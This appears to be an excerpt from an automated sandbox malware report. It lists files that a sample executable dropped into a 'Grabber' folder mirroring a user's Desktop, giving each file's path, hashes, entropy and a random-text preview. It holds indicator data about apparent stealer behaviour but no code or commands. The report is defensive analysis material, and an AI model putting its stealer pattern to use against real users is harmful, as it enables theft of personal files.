Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EWZCVGNOWT.xlsx

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GIGIYTFFYT.png

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.7020597455120665
Encrypted:	false
SSDEEP:	24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
MD5:	47F4925C44B6916FE1BEE7FBB1ACF777
SHA1:	D7BFAEF09A15A105540FC44D2C307778C0553CE5
SHA-256:	62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
SHA-512:	6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
Malicious:	false
Preview:	GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\JDDHMPCDUJ.jpg

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687055908915499
Encrypted:	false
SSDEEP:	24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
MD5:	94EDB575C55407C555A3F710DF2A8CB3
SHA1:	3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
SHA-256:	DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
SHA-512:	F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
Malicious:	false
Preview:	JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KLIZUSIQEN.pdf

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696703751818505
Encrypted:	false
SSDEEP:	24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
MD5:	19255ED5D4F37A096C105CEF82D0F5C0
SHA1:	96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
SHA-256:	A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
SHA-512:	CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
Malicious:	false
Preview:	KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NYMMPCEIMA.png

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6957997909429325
Encrypted:	false
SSDEEP:	24:kKnyV7BxweFQl79j+hRxUY//oWt/yeHEMcXJn25feaqrZZqW+LRJvy:kKnY7wGQlSxH/9kM0Jn25grZgRJa
MD5:	4F49714E789620AEDB7B9565DC949466
SHA1:	5917AC09E3D5074BFF8E1289865CAFF6403D1E82
SHA-256:	A9D5D3D8BE1D9E0187DA4AF85AFF3E2D1D6DE977D13EDA76900C96D98A8F073B
SHA-512:	61F147FA2B300AC2E3A42445F1283A47C805B756F36730CDCD4DB5A711BE43EFA471C7ECFB865908791852D1AAF365284BD4DE01F0EA0BF9DCD416A853C804E9
Malicious:	false
Preview:	NYMMPCEIMABCZIWJTJBTGSCCAGUWVTYLYWSVBSDZXQVJYUDCVLRURABBOBVCVDMKRKSRCSPXNAWPZJIOBULMRNUUOMOQGMWJLMZDBRBKAATADQPXHJFNCLPVAYDJHNDQMYWKBXYCBZJQANHQXCJPZQWORFXISYXSVTGTQJXNOUHRMKMJWJYCVNYAJFLKQVPGEYIUPPSZIHLNRGNCVNQBEZHDSJLAAKTOQOPFKISQUVSYIJUTXMPMVSFBVQNNFUXQRBBZWPVQFKOIAVQQMWQKLBSRPGKOQWZJAMBIDYJLYFILNAEEJCLRGBXDTSTBTNJDUXNFJBEZUDHSQUEENVIJUBNKGOLASBWAZBYYZZCOGWIJLRICWMFOAHSZVHCPRGDQXQUHZNZAIBOSXNAEYXAGWDBIHQGHOMKGZVYJDFBRWFKGJWGGPPTKNYWOHJZEIWRXWBERKQREQFMJHAKYHJCBTJJONCVMKTRJZVEWZOAKRUZLPQOXEQLKYATRQESEWRXETALDGKSHWFGQVXVYWPZEUDKTVGFGTXHQNKYUTVLNVAJFDYFPLRACHLYNSSVZZIAKKEEENZFLNPGNCVKMHGOYMQEBOXNMEXNXHUPMZAMZZQVDPFGLUSJHKGQWGKDPXMSIYPGNIXUXSJQFAXJLLSOUEANCWYAHDTOQTEKVGNOWSZINVNYZYIYNTVHHTDVGBTBPYPINRBPJYKHMRFCGSMCNFESVFMQIFPOJDAJGZEYTMLYQIIYRBVNEZSIWWOKGVIVGLXAQUNYDTWHGEWOLDMZRPSOAJKFXVJJTTIAJVLZGIFIWTHVZZGQOVGNSYXTJVFSXNDQLHICPBSAZIKIPLGSRTCKFEGRKNLTONCJFACYIGQPYUHVPNPUUGOOGHBAMCKOGYKVNNBSVPYVHZVJCMTDSHLBWEDMSWSFZAIRFDEYBDVHTWHABAXCAQCTXQRIUHVQFAEPMNYIWIBWVEEZTZGQTPDYRFAGKUGAEBSQFYYQG

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZGGKNSUKOP.docx

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZGGKNSUKOP.xlsx

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZGGKNSUKOP\EWZCVGNOWT.xlsx

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZGGKNSUKOP\JDDHMPCDUJ.jpg

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687055908915499
Encrypted:	false
SSDEEP:	24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
MD5:	94EDB575C55407C555A3F710DF2A8CB3
SHA1:	3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
SHA-256:	DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
SHA-512:	F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
Malicious:	false
Preview:	JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZGGKNSUKOP\KLIZUSIQEN.pdf

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696703751818505
Encrypted:	false
SSDEEP:	24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
MD5:	19255ED5D4F37A096C105CEF82D0F5C0
SHA1:	96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
SHA-256:	A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
SHA-512:	CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
Malicious:	false
